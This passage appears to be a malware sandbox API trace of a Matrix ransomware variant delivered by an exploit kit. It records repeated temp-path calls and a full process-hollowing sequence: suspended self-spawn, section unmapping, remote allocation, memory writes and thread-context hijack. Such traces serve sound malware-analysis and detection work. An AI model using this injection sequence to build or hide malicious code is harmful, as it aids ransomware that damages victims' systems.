nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, 
lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: 
nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.922] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] 
GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 
0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.923] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0085.993] VirtualProtect (in: lpAddress=0x213388, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0085.995] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0085.995] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0085.995] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0085.995] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 
[0085.995] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0085.995] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0085.996] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0085.996] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0085.996] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0085.996] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0085.996] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0085.996] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0085.996] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0085.996] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0085.996] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0085.996] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0085.996] RegisterClassExA (param_1=0x12fbc0) returned 0xc13b [0086.002] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, 
hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0x50144 [0086.575] PostMessageA (hWnd=0x50144, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0086.575] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0086.576] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0086.576] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1c0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe" (normalized: "c:\\users\\eebsym5\\desktop\\2017-04-03-eitest-rig-ek-payload-matrix-ransomware-variant.exe")) returned 0x57 [0086.576] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" " [0086.576] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\Desktop\\2017-04-03-EITest-Rig-EK-payload-matrix-ransomware-variant.exe\" ", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xa88, dwThreadId=0xa8c)) returned 1 [0086.579] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.579] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0086.579] 
GetThreadContext (in: hThread=0x48, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x402581, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, 
[61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, 
[246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, 
[427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0086.580] ReadProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x12fb3c, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x12fb3c*, lpNumberOfBytesRead=0x0) returned 1 [0086.580] NtUnmapViewOfSection (ProcessHandle=0x4c, BaseAddress=0x400000) returned 0x0 [0086.580] VirtualAllocEx (hProcess=0x4c, lpAddress=0x400000, dwSize=0x11d000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0086.580] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x400000, lpBuffer=0x214628*, nSize=0x1000, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x214628*, lpNumberOfBytesWritten=0x0) returned 1 [0086.582] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x401000, lpBuffer=0x214a28, nSize=0x0, lpNumberOfBytesWritten=0x0 | out: lpNumberOfBytesWritten=0x0) returned 0 [0086.582] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x4c7000, lpBuffer=0x214a28*, nSize=0x54600, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x214a28*, lpNumberOfBytesWritten=0x0) returned 1 [0086.589] WriteProcessMemory (in: hProcess=0x4c, 
lpBaseAddress=0x51c000, lpBuffer=0x269028*, nSize=0x800, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x269028*, lpNumberOfBytesWritten=0x0) returned 1 [0086.590] WriteProcessMemory (in: hProcess=0x4c, lpBaseAddress=0x7ffdf008, lpBuffer=0x21475c*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x21475c*, lpNumberOfBytesWritten=0x0) returned 1 [0086.590] SetThreadContext (hThread=0x48, lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x51b2d0, Ebp=0x0, Eip=0x77277098, SegCs=0x1b, EFlags=0x200, Esp=0x12fff0, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, 
